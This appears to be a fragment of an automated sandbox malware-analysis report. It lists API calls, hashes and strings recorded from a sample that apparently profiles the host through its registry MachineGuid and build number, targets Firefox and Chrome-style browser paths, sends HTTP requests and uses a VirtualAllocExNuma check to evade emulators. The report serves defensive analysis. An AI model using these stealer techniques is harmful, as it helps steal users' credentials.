                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                    • API String ID: 4174444224-1526165396
                                                                                                                                                                                                                                                    • Opcode ID: 60f81f21912bdd6b30cf87f3a54a84589bae9b0b3cffbe8bea09c0b53374170c
                                                                                                                                                                                                                                                    • Instruction ID: 17f54ae964516102d12c6c786dc5fb332c2c807693ceeb7db5001b258630f954
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60f81f21912bdd6b30cf87f3a54a84589bae9b0b3cffbe8bea09c0b53374170c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7721AC32D10104ABCF20BB74EC4A8EDBBF8BF15310B114166F959EB153DB369D45AB81
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481), ref: 0008EAF9
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481), ref: 0008EB56
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0008EE1D
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481), ref: 0008EC33
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481), ref: 0008ECE3
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(0094C481), ref: 0008ED40
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy
                                                                                                                                                                                                                                                    • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                                                                                                    • API String ID: 3722407311-2697854757
                                                                                                                                                                                                                                                    • Opcode ID: 330e755a5acceb3ed6e28b61c0f423ca30b30309cc5dbf3a7a4b4b61e9ce12ac
                                                                                                                                                                                                                                                    • Instruction ID: 944d77d85ce75c369d6a79d8860be8d390eb218c617d15e8ecb1ff3ea3b10990
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 330e755a5acceb3ed6e28b61c0f423ca30b30309cc5dbf3a7a4b4b61e9ce12ac
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30B14932D00509AFDF20FFA8E947BCE77B5BF40314F564150F958AB252DA30AE199B92
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,.192827.1814076.1361492.23132.3200675.2552048.4491519.0238847.1290844.0536269.4231419.0299841.65291-.2698553 2.6225356-1.4375148 8.986738-2.0315537 11.9240228-.2513602 1.2428753-.7499132 1.5088847-1.2290685 1.5496672-1.0413153.0886298-1.8284257-.4857912-2.8369,00003000,00000004), ref: 000810AA
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 000810D0
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,.192827.1814076.1361492.23132.3200675.2552048.4491519.0238847.1290844.0536269.4231419.0299841.65291-.2698553 2.6225356-1.4375148 8.986738-2.0315537 11.9240228-.2513602 1.2428753-.7499132 1.5088847-1.2290685 1.5496672-1.0413153.0886298-1.8284257-.4857912-2.8369,00008000), ref: 000810E6
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,000984CC), ref: 00081100
                                                                                                                                                                                                                                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00081107
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00081112
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • .192827.1814076.1361492.23132.3200675.2552048.4491519.0238847.1290844.0536269.4231419.0299841.65291-.2698553 2.6225356-1.4375148 8.986738-2.0315537 11.9240228-.2513602 1.2428753-.7499132 1.5088847-1.2290685 1.5496672-1.0413153.0886298-1.8284257-.4857912-2.8369, xrefs: 000810A2, 000810A7, 000810E4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                                                                                                    • String ID: .192827.1814076.1361492.23132.3200675.2552048.4491519.0238847.1290844.0536269.4231419.0299841.65291-.2698553 2.6225356-1.4375148 8.986738-2.0315537 11.9240228-.2513602 1.2428753-.7499132 1.5088847-1.2290685 1.5496672-1.0413153.0886298-1.8284257-.4857912-2.8369
                                                                                                                                                                                                                                                    • API String ID: 1859398019-2322752083
                                                                                                                                                                                                                                                    • Opcode ID: aca955f9da21bc63cb134809e02533f6ee51ca08615385fdc08eec9b06864f7a
                                                                                                                                                                                                                                                    • Instruction ID: b1f2a1e8fa3bdbd30db306685554023c86bb7f0d8c1552a8354d699279e392d1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aca955f9da21bc63cb134809e02533f6ee51ca08615385fdc08eec9b06864f7a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BF0C87238131077F26032752C5EFEB6A5CAF41F61F204010F308EB2C1D69998059B74
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00091607
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00091626
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0009164B
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00091657
                                                                                                                                                                                                                                                    • CharToOemA.USER32(?,?), ref: 0009166B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                                                                                                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                    • API String ID: 2235053359-1211650757
                                                                                                                                                                                                                                                    • Opcode ID: a7e3f7d2302aad444fd25daaa351007bae66f8b27fc006edabca38f2ef99d4da
                                                                                                                                                                                                                                                    • Instruction ID: 06cb3d758ffd4ce14603df5cecf1a15372e2ea9f4a07111a0f6d7a854157ad7e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7e3f7d2302aad444fd25daaa351007bae66f8b27fc006edabca38f2ef99d4da
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02111EB594121DAFEB10EB90EC89FEAB7BCEB04304F4001E5B659E6052D674AE889F10
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090B44
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090B4B
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,000B6888,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090B79
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(000B6888,00000000,00000000,00000000,000000FF,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090B95
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(000B6888,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090B9E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                    • String ID: Windows 11
                                                                                                                                                                                                                                                    • API String ID: 3466090806-2517555085
                                                                                                                                                                                                                                                    • Opcode ID: d41b254887a025b68aa0dbf44cd38f885edee283b2ad8514bbf19f38ffe2e9b0
                                                                                                                                                                                                                                                    • Instruction ID: cb73217979a6d931c7d9c2387716607a0aefe4abc39957dbcb89a6615bed7e22
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d41b254887a025b68aa0dbf44cd38f885edee283b2ad8514bbf19f38ffe2e9b0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64F04475A00204BFEF106B91FC4EFAE7B69EB44B49F150065F601A9191D7B19D40A720
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00090C1B,00090B58,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090BBD
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00090C1B,00090B58,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090BC4
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,000B6888,?,?,?,00090C1B,00090B58,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090BE2
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(000B6888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00090C1B,00090B58,?,?,?,00093E95,Windows: ), ref: 00090BFD
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(000B6888,?,?,?,00090C1B,00090B58,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090C06
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                    • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                    • API String ID: 3466090806-1022791448
                                                                                                                                                                                                                                                    • Opcode ID: fb12643e2ddf38fc83df5e666f882e422ab6961e099d615fae90cb419b643517
                                                                                                                                                                                                                                                    • Instruction ID: 8971c55e9af09a1ecb4bad7950a25869d32ae80b3aec46e7330f29c26282eae7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb12643e2ddf38fc83df5e666f882e422ab6961e099d615fae90cb419b643517
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11F09075A40204FBEF106B90FC0EFAE7B7CEB44B45F140055F601A9191EAB19D40EB20
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
                                                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(0008ECBC,?,?,?,?,0008E756,?,?,?), ref: 0008802B
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
